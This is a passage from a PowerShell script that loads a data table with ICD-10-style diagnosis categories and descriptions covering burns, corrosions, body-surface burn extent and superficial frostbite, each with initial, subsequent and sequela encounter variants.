subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of other specified parts of unspecified eye and adnexa","Corrosions of other specified parts of unspecified eye and adnexa, sequela") + $null = $DiagnosisList.Rows.Add("Corrosions of other specified parts of right eye and adnexa","Corrosions of other specified parts of right eye and adnexa, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of other specified parts of right eye and adnexa","Corrosions of other specified parts of right eye and adnexa, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of other specified parts of right eye and adnexa","Corrosions of other specified parts of right eye and adnexa, sequela") + $null = $DiagnosisList.Rows.Add("Corrosions of other specified parts of left eye and adnexa","Corrosions of other specified parts of left eye and adnexa, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of other specified parts of left eye and adnexa","Corrosions of other specified parts of left eye and adnexa, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of other specified parts of left eye and adnexa","Corrosions of other specified parts of left eye and adnexa, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified eye and adnexa, part unspecified","Corrosion of unspecified eye and adnexa, part unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified eye and adnexa, part unspecified","Corrosion of unspecified eye and adnexa, part unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified eye and adnexa, part unspecified","Corrosion of unspecified eye and adnexa, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of right eye and adnexa, part unspecified","Corrosion of right eye and adnexa, part unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of right eye and adnexa, part unspecified","Corrosion of right eye and adnexa, part unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of right eye and adnexa, part unspecified","Corrosion of right eye and adnexa, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of left eye and adnexa, part unspecified","Corrosion of left eye and adnexa, part unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of left eye and adnexa, part unspecified","Corrosion of left eye and adnexa, part unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of left eye and adnexa, part unspecified","Corrosion of left eye and adnexa, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Burn of larynx and trachea","Burn of larynx and trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of larynx and trachea","Burn of larynx and trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of larynx and trachea","Burn of larynx and trachea, sequela") + $null = $DiagnosisList.Rows.Add("Burn involving larynx and trachea with lung","Burn involving larynx and trachea with lung, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn involving larynx and trachea with lung","Burn involving larynx and trachea with lung, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn involving larynx and trachea with lung","Burn involving larynx and trachea with lung, sequela") + $null = $DiagnosisList.Rows.Add("Burn of other parts of respiratory tract","Burn of other parts of respiratory tract, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of other parts of respiratory tract","Burn of other parts of respiratory tract, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of other parts of respiratory tract","Burn of other parts of respiratory tract, sequela") + $null = $DiagnosisList.Rows.Add("Burn of respiratory tract, part unspecified","Burn of respiratory tract, part unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of respiratory tract, part unspecified","Burn of respiratory tract, part unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of respiratory tract, part unspecified","Burn of respiratory tract, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of larynx and trachea","Corrosion of larynx and trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of larynx and trachea","Corrosion of larynx and trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of larynx and trachea","Corrosion of larynx and trachea, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion involving larynx and trachea with lung","Corrosion involving larynx and trachea with lung, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion involving larynx and trachea with lung","Corrosion involving larynx and trachea with lung, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion involving larynx and trachea with lung","Corrosion involving larynx and trachea with lung, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of other parts of respiratory tract","Corrosion of other parts of respiratory tract, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of other parts of respiratory tract","Corrosion of other parts of respiratory tract, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of other parts of respiratory tract","Corrosion of other parts of respiratory tract, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of respiratory tract, part unspecified","Corrosion of respiratory tract, part unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of respiratory tract, part unspecified","Corrosion of respiratory tract, part unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of respiratory tract, part unspecified","Corrosion of respiratory tract, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Burn of mouth and pharynx","Burn of mouth and pharynx, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of mouth and pharynx","Burn of mouth and pharynx, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of mouth and pharynx","Burn of mouth and pharynx, sequela") + $null = $DiagnosisList.Rows.Add("Burn of esophagus","Burn of esophagus, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of esophagus","Burn of esophagus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of esophagus","Burn of esophagus, sequela") + $null = $DiagnosisList.Rows.Add("Burn of other parts of alimentary tract","Burn of other parts of alimentary tract, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of other parts of alimentary tract","Burn of other parts of alimentary tract, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of other parts of alimentary tract","Burn of other parts of alimentary tract, sequela") + $null = $DiagnosisList.Rows.Add("Burn of internal genitourinary organs","Burn of internal genitourinary organs, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of internal genitourinary organs","Burn of internal genitourinary organs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of internal genitourinary organs","Burn of internal genitourinary organs, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified internal organ","Burn of unspecified internal organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified internal organ","Burn of unspecified internal organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified internal organ","Burn of unspecified internal organ, sequela") + $null = $DiagnosisList.Rows.Add("Burn of right ear drum","Burn of right ear drum, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of right ear drum","Burn of right ear drum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of right ear drum","Burn of right ear drum, sequela") + $null = $DiagnosisList.Rows.Add("Burn of left ear drum","Burn of left ear drum, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of left ear drum","Burn of left ear drum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of left ear drum","Burn of left ear drum, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified ear drum","Burn of unspecified ear drum, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified ear drum","Burn of unspecified ear drum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified ear drum","Burn of unspecified ear drum, sequela") + $null = $DiagnosisList.Rows.Add("Burn of other internal organ","Burn of other internal organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of other internal organ","Burn of other internal organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of other internal organ","Burn of other internal organ, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of mouth and pharynx","Corrosion of mouth and pharynx, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of mouth and pharynx","Corrosion of mouth and pharynx, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of mouth and pharynx","Corrosion of mouth and pharynx, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of esophagus","Corrosion of esophagus, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of esophagus","Corrosion of esophagus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of esophagus","Corrosion of esophagus, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of other parts of alimentary tract","Corrosion of other parts of alimentary tract, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of other parts of alimentary tract","Corrosion of other parts of alimentary tract, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of other parts of alimentary tract","Corrosion of other parts of alimentary tract, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of internal genitourinary organs","Corrosion of internal genitourinary organs, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of internal genitourinary organs","Corrosion of internal genitourinary organs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of internal genitourinary organs","Corrosion of internal genitourinary organs, sequela") + $null = $DiagnosisList.Rows.Add("Corrosions of unspecified internal organs","Corrosions of unspecified internal organs, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of unspecified internal organs","Corrosions of unspecified internal organs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of unspecified internal organs","Corrosions of unspecified internal organs, sequela") + $null = $DiagnosisList.Rows.Add("Corrosions of right ear drum","Corrosions of right ear drum, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of right ear drum","Corrosions of right ear drum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of right ear drum","Corrosions of right ear drum, sequela") + $null = $DiagnosisList.Rows.Add("Corrosions of left ear drum","Corrosions of left ear drum, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of left ear drum","Corrosions of left ear drum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of left ear drum","Corrosions of left ear drum, sequela") + $null = $DiagnosisList.Rows.Add("Corrosions of unspecified ear drum","Corrosions of unspecified ear drum, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of unspecified ear drum","Corrosions of unspecified ear drum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of unspecified ear drum","Corrosions of unspecified ear drum, sequela") + $null = $DiagnosisList.Rows.Add("Corrosions of other internal organs","Corrosions of other internal organs, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of other internal organs","Corrosions of other internal organs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosions of other internal organs","Corrosions of other internal organs, sequela") + $null = $DiagnosisList.Rows.Add("Burn and corrosion, body region unspecified","Burn of unspecified body region, unspecified degree") + $null = $DiagnosisList.Rows.Add("Burn and corrosion, body region unspecified","Corrosion of unspecified body region, unspecified degree") + $null = $DiagnosisList.Rows.Add("Burns classified according to extent of body surface involved","Burns involving less than 10% of body surface") + $null = $DiagnosisList.Rows.Add("Burns involving 10-19% of body surface","Burns involving 10-19% of body surface with 0% to 9% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 10-19% of body surface","Burns involving 10-19% of body surface with 10-19% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 20-29% of body surface","Burns involving 20-29% of body surface with 0% to 9% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 20-29% of body surface","Burns involving 20-29% of body surface with 10-19% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 20-29% of body surface","Burns involving 20-29% of body surface with 20-29% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 30-39% of body surface","Burns involving 30-39% of body surface with 0% to 9% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 30-39% of body surface","Burns involving 30-39% of body surface with 10-19% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 30-39% of body surface","Burns involving 30-39% of body surface with 20-29% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 30-39% of body surface","Burns involving 30-39% of body surface with 30-39% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 40-49% of body surface","Burns involving 40-49% of body surface with 0% to 9% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 40-49% of body surface","Burns involving 40-49% of body surface with 10-19% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 40-49% of body surface","Burns involving 40-49% of body surface with 20-29% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 40-49% of body surface","Burns involving 40-49% of body surface with 30-39% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 40-49% of body surface","Burns involving 40-49% of body surface with 40-49% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 50-59% of body surface","Burns involving 50-59% of body surface with 0% to 9% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 50-59% of body surface","Burns involving 50-59% of body surface with 10-19% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 50-59% of body surface","Burns involving 50-59% of body surface with 20-29% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 50-59% of body surface","Burns involving 50-59% of body surface with 30-39% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 50-59% of body surface","Burns involving 50-59% of body surface with 40-49% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 50-59% of body surface","Burns involving 50-59% of body surface with 50-59% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 60-69% of body surface","Burns involving 60-69% of body surface with 0% to 9% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 60-69% of body surface","Burns involving 60-69% of body surface with 10-19% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 60-69% of body surface","Burns involving 60-69% of body surface with 20-29% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 60-69% of body surface","Burns involving 60-69% of body surface with 30-39% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 60-69% of body surface","Burns involving 60-69% of body surface with 40-49% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 60-69% of body surface","Burns involving 60-69% of body surface with 50-59% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 60-69% of body surface","Burns involving 60-69% of body surface with 60-69% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 70-79% of body surface","Burns involving 70-79% of body surface with 0% to 9% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 70-79% of body surface","Burns involving 70-79% of body surface with 10-19% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 70-79% of body surface","Burns involving 70-79% of body surface with 20-29% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 70-79% of body surface","Burns involving 70-79% of body surface with 30-39% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 70-79% of body surface","Burns involving 70-79% of body surface with 40-49% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 70-79% of body surface","Burns involving 70-79% of body surface with 50-59% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 70-79% of body surface","Burns involving 70-79% of body surface with 60-69% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 70-79% of body surface","Burns involving 70-79% of body surface with 70-79% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 80-89% of body surface","Burns involving 80-89% of body surface with 0% to 9% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 80-89% of body surface","Burns involving 80-89% of body surface with 10-19% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 80-89% of body surface","Burns involving 80-89% of body surface with 20-29% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 80-89% of body surface","Burns involving 80-89% of body surface with 30-39% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 80-89% of body surface","Burns involving 80-89% of body surface with 40-49% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 80-89% of body surface","Burns involving 80-89% of body surface with 50-59% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 80-89% of body surface","Burns involving 80-89% of body surface with 60-69% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 80-89% of body surface","Burns involving 80-89% of body surface with 70-79% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 80-89% of body surface","Burns involving 80-89% of body surface with 80-89% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 90% or more of body surface","Burns involving 90% or more of body surface with 0% to 9% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 90% or more of body surface","Burns involving 90% or more of body surface with 10-19% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 90% or more of body surface","Burns involving 90% or more of body surface with 20-29% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 90% or more of body surface","Burns involving 90% or more of body surface with 30-39% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 90% or more of body surface","Burns involving 90% or more of body surface with 40-49% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 90% or more of body surface","Burns involving 90% or more of body surface with 50-59% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 90% or more of body surface","Burns involving 90% or more of body surface with 60-69% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 90% or more of body surface","Burns involving 90% or more of body surface with 70-79% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 90% or more of body surface","Burns involving 90% or more of body surface with 80-89% third degree burns") + $null = $DiagnosisList.Rows.Add("Burns involving 90% or more of body surface","Burns involving 90% or more of body surface with 90% or more third degree burns") + $null = $DiagnosisList.Rows.Add("Corrosions classified according to extent of body surface involved","Corrosions involving less than 10% of body surface") + $null = $DiagnosisList.Rows.Add("Corrosions involving 10-19% of body surface","Corrosions involving 10-19% of body surface with 0% to 9% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 10-19% of body surface","Corrosions involving 10-19% of body surface with 10-19% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 20-29% of body surface","Corrosions involving 20-29% of body surface with 0% to 9% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 20-29% of body surface","Corrosions involving 20-29% of body surface with 10-19% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 20-29% of body surface","Corrosions involving 20-29% of body surface with 20-29% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 30-39% of body surface","Corrosions involving 30-39% of body surface with 0% to 9% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 30-39% of body surface","Corrosions involving 30-39% of body surface with 10-19% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 30-39% of body surface","Corrosions involving 30-39% of body surface with 20-29% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 30-39% of body surface","Corrosions involving 30-39% of body surface with 30-39% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 40-49% of body surface","Corrosions involving 40-49% of body surface with 0% to 9% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 40-49% of body surface","Corrosions involving 40-49% of body surface with 10-19% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 40-49% of body surface","Corrosions involving 40-49% of body surface with 20-29% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 40-49% of body surface","Corrosions involving 40-49% of body surface with 30-39% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 40-49% of body surface","Corrosions involving 40-49% of body surface with 40-49% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 50-59% of body surface","Corrosions involving 50-59% of body surface with 0% to 9% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 50-59% of body surface","Corrosions involving 50-59% of body surface with 10-19% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 50-59% of body surface","Corrosions involving 50-59% of body surface with 20-29% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 50-59% of body surface","Corrosions involving 50-59% of body surface with 30-39% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 50-59% of body surface","Corrosions involving 50-59% of body surface with 40-49% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 50-59% of body surface","Corrosions involving 50-59% of body surface with 50-59% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 60-69% of body surface","Corrosions involving 60-69% of body surface with 0% to 9% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 60-69% of body surface","Corrosions involving 60-69% of body surface with 10-19% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 60-69% of body surface","Corrosions involving 60-69% of body surface with 20-29% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 60-69% of body surface","Corrosions involving 60-69% of body surface with 30-39% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 60-69% of body surface","Corrosions involving 60-69% of body surface with 40-49% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 60-69% of body surface","Corrosions involving 60-69% of body surface with 50-59% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 60-69% of body surface","Corrosions involving 60-69% of body surface with 60-69% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 70-79% of body surface","Corrosions involving 70-79% of body surface with 0% to 9% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 70-79% of body surface","Corrosions involving 70-79% of body surface with 10-19% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 70-79% of body surface","Corrosions involving 70-79% of body surface with 20-29% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 70-79% of body surface","Corrosions involving 70-79% of body surface with 30-39% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 70-79% of body surface","Corrosions involving 70-79% of body surface with 40-49% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 70-79% of body surface","Corrosions involving 70-79% of body surface with 50-59% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 70-79% of body surface","Corrosions involving 70-79% of body surface with 60-69% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 70-79% of body surface","Corrosions involving 70-79% of body surface with 70-79% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 80-89% of body surface","Corrosions involving 80-89% of body surface with 0% to 9% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 80-89% of body surface","Corrosions involving 80-89% of body surface with 10-19% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 80-89% of body surface","Corrosions involving 80-89% of body surface with 20-29% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 80-89% of body surface","Corrosions involving 80-89% of body surface with 30-39% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 80-89% of body surface","Corrosions involving 80-89% of body surface with 40-49% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 80-89% of body surface","Corrosions involving 80-89% of body surface with 50-59% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 80-89% of body surface","Corrosions involving 80-89% of body surface with 60-69% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 80-89% of body surface","Corrosions involving 80-89% of body surface with 70-79% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 80-89% of body surface","Corrosions involving 80-89% of body surface with 80-89% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 90% or more of body surface","Corrosions involving 90% or more of body surface with 0% to 9% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 90% or more of body surface","Corrosions involving 90% or more of body surface with 10-19% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 90% or more of body surface","Corrosions involving 90% or more of body surface with 20-29% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 90% or more of body surface","Corrosions involving 90% or more of body surface with 30-39% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 90% or more of body surface","Corrosions involving 90% or more of body surface with 40-49% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 90% or more of body surface","Corrosions involving 90% or more of body surface with 50-59% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 90% or more of body surface","Corrosions involving 90% or more of body surface with 60-69% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 90% or more of body surface","Corrosions involving 90% or more of body surface with 70-79% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 90% or more of body surface","Corrosions involving 90% or more of body surface with 80-89% third degree corrosion") + $null = $DiagnosisList.Rows.Add("Corrosions involving 90% or more of body surface","Corrosions involving 90% or more of body surface with 90% or more third degree corrosion") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right ear","Superficial frostbite of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right ear","Superficial frostbite of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right ear","Superficial frostbite of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left ear","Superficial frostbite of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left ear","Superficial frostbite of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left ear","Superficial frostbite of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified ear","Superficial frostbite of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified ear","Superficial frostbite of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified ear","Superficial frostbite of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of nose","Superficial frostbite of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of nose","Superficial frostbite of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of nose","Superficial frostbite of nose, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of other part of head","Superficial frostbite of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of other part of head","Superficial frostbite of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of other part of head","Superficial frostbite of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of neck","Superficial frostbite of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of neck","Superficial frostbite of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of neck","Superficial frostbite of neck, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of thorax","Superficial frostbite of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of thorax","Superficial frostbite of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of thorax","Superficial frostbite of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of abdominal wall, lower back and pelvis","Superficial frostbite of abdominal wall, lower back and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of abdominal wall, lower back and pelvis","Superficial frostbite of abdominal wall, lower back and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of abdominal wall, lower back and pelvis","Superficial frostbite of abdominal wall, lower back and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified arm","Superficial frostbite of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified arm","Superficial frostbite of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified arm","Superficial frostbite of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right arm","Superficial frostbite of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right arm","Superficial frostbite of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right arm","Superficial frostbite of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left arm","Superficial frostbite of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left arm","Superficial frostbite of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left arm","Superficial frostbite of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right wrist","Superficial frostbite of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right wrist","Superficial frostbite of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right wrist","Superficial frostbite of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left wrist","Superficial frostbite of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left wrist","Superficial frostbite of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left wrist","Superficial frostbite of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified wrist","Superficial frostbite of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified wrist","Superficial frostbite of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified wrist","Superficial frostbite of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right hand","Superficial frostbite of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right hand","Superficial frostbite of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right hand","Superficial frostbite of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left hand","Superficial frostbite of left hand, initial 